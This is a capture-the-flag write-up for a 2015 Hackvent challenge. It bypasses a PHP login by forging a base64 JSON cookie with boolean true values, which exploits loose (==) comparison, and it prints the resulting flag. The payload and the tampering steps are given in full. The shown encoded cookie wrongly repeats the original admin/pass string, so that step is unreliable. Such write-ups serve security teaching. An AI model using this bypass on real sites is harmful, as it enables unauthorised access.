Link to challenge: http://hackvent.hacking-lab.com
Date Completed: 08 December 2015
Challenge
1 |
The challenge required one to enter a username and password to login to a website. The website was running PHP 5.4. |
Link to website (may be down): http://hackvent.hacking-lab.com/xMasStore_wqbrGjHxxZ9YkbfiKiGC/index.php
Solution
I inspect the source of the website and take a look at the background image but that seems to be fine. There is nothing else of interest on the website so I figure this may require a brute-force attack.
I then however find a cookie that is generated once I fail to authenticate with the website. I try to login using the username admin and the password pass. The following cookie is generated for me:
1 |
eyJ1c2VyIjoiYWRtaW4iLCJwYXNzd29yZCI6InBhc3MifQ%3D%3D |
I then replace %3D with = and decode the above as base64.
1 2 3 4 |
eyJ1c2VyIjoiYWRtaW4iLCJwYXNzd29yZCI6InBhc3MifQ== Decoded: {"user":"admin","password":"pass"} |
Thus it is obvious that the cookie is simply calculated like so:
1 |
cookie = base64_enc(JSON.stringify(json_data)) |
I then try to tinker with the cookie fields. I figure that the challenge would not be making any database calls and thus the password would be hardcoded. In this case, the PHP code in the authentication script would look like so:
1 |
if ($pass === SOMETHING) {....} |
The above uses strict comparison. However, the PHP script may use loose comparison which opens up a vulnerability. This turns out to be the case and the script does something like this:
1 |
if ($pass == SOMETHING) {....} |
In the above examples SOMETHING can be anything we want it to be. It does not have to just be a string. We could modify our JSON payload to pass a value like true as the username and password. This is what we will do as a loose comparison with true is almost always true (unless the true username or password is “0” which is unlikely).
We construct our payload:
1 |
{"user":true,"password":true} |
Then we encrypt this using base64 (converting all = symbols back to %3D ):
1 2 |
eyJ1c2VyIjoiYWRtaW4iLCJwYXNzd29yZCI6InBhc3MifQ== eyJ1c2VyIjoiYWRtaW4iLCJwYXNzd29yZCI6InBhc3MifQ%3D%3D |
Finally, we use a scripting language or a web browser extension (I used EditThisCookie for Chrome) to load the cookie for the webpage. Then we refresh the page and are greeted with the following message:
1 |
Welcome admin! Here is your daily goodie: |
The goodie is our flag!
Flag: HV15-0Ch0-91zo-m99Y-kxGI-8iQ5